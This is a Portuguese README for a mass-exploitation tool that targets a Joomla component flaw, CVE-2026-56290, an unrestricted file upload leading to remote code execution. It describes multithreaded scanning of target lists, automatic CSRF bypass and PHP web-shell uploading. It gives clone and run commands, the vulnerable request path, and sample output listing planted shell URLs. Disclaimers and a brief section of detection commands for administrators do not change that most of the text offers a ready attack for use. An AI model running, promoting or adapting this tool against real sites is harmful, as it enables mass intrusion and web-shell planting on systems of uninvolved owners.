
CVE-2026-56290 - Exploração em massa do componente Com_pagebuilderck do Joomla (Upload de arquivo sem restrições → RCE). Multithread, bypass automático de CSRF, uploader de shell PHP.
Esta ferramenta destina-se exclusivamente a fins educacionais e de testes de segurança autorizados.
- O acesso não autorizado a sistemas computacionais é ilegal
- Use esta ferramenta apenas em sistemas que você possua ou para os quais tenha permissão explícita de teste
- O autor não é responsável por qualquer uso indevido ou dano causado por esta ferramenta
- Ao usar esta ferramenta, você concorda em cumprir todas as leis e regulamentos aplicáveis
Mais avisos: você pode ver o aviso legal na capa do Jenderal92. Você pode conferi-lo AQUI !!!
CVE-2026-56290 é uma ferramenta de exploração em massa que visa o componente Com_pagebuilderck do Joomla. Essa vulnerabilidade permite que atacantes remotos façam upload de arquivos PHP arbitrários por meio de um mecanismo de upload de arquivos sem restrições, levando à Execução Remota de Código (RCE).
| Atributo | Valor |
|---|---|
| ID do CVE | CVE-2026-56290 |
| Componente | Com_pagebuilderck |
| Plataforma | Joomla! CMS |
| Tipo | Upload de Arquivo Sem Restrições (RCE) |
| Pontuação CVSS | 9.8 (Crítico) |
/media/com_pagebuilderck/gfonts/reslt.txtPython 2.7
pip (Python package installer)
Dependências do Python
pip install requests colorama
🔧 Instalação
git clone https://github.com/Jenderal92/CVE-2026-56290.git
cd CVE-2026-56290
pip install -r requirements.txt
📖 Uso
Uso Básico
python CVE-2026-56290.py targets.txt
Formato do Arquivo de Entrada
Crie um arquivo targets.txt com uma URL por linha:
https://example1.com
http://example2.com/joomla
https://example3.com:8080
# Comments are ignored
Saída
· Saída no Console: Progresso e resultados em tempo real · reslt.txt: Contém todas as URLs de shell vulneráveis
Exemplo de Execução
$ python CVE-2026-56290.py targets.txt
[+] CVE-2026-56290 - Com_pagebuilderck Mass Exploit
[+] Threads: 15
[+] Timeout: 10s
[+] Output file: reslt.txt
[+] Loaded 100 targets from file
[*] Starting pool with 15 processes...
[1] Queueing: https://example1.com
[2] Queueing: https://example2.com
...
[1] ✓✓✓ VULNERABLE: https://example1.com/media/com_pagebuilderck/gfonts/shell_abc123.php
⚙️ Configuração
Você pode modificar estas variáveis no script:
THREADS = 15 # Number of concurrent workers
TIMEOUT = 10 # Request timeout in seconds
USER_AGENT = "..." # Custom User-Agent string
OUTPUT_FILE = "reslt.txt" # Output filename
🛡️ Considerações de Segurança
Para Administradores de Sistema
Se você executa um site Joomla com o Com_pagebuilderck:
Indicadores de Comprometimento (IoC)
Procure por estes sinais de exploração:
# Suspicious files in
/media/com_pagebuilderck/gfonts/*.php
/media/com_pagebuilderck/gfonts/*.phtml
/media/com_pagebuilderck/gfonts/*.phar
# Suspicious requests
/index.php?option=com_pagebuilderck&task=browse.ajaxAddPicture&[token]=1
Comandos de Detecção
# Find suspicious PHP files in the media directory
find /path/to/joomla/media/com_pagebuilderck/gfonts/ -name "*.php" -type f
# Check for recent modifications
find /path/to/joomla/media/com_pagebuilderck/gfonts/ -type f -mtime -7
# Look for suspicious file names (random strings)
ls -la /path/to/joomla/media/com_pagebuilderck/gfonts/ | grep -E '[a-z0-9]{8,}\.(php|phtml|phar)'
⚠️ Aviso Legal
Este software é fornecido "NO ESTADO EM QUE SE ENCONTRA" ("AS IS"), sem garantia de qualquer tipo. O autor não é responsável por qualquer uso ilegal ou antiético desta ferramenta. Sempre obtenha autorização adequada antes de testar qualquer sistema.
🙏 Agradecimentos
· Pesquisadores de segurança que descobriram e reportaram o CVE-2026-56290 · Comunidade Joomla por manter o CMS
Lembre-se: Com grandes poderes vêm grandes responsabilidades. Use esta ferramenta de forma ética e legal.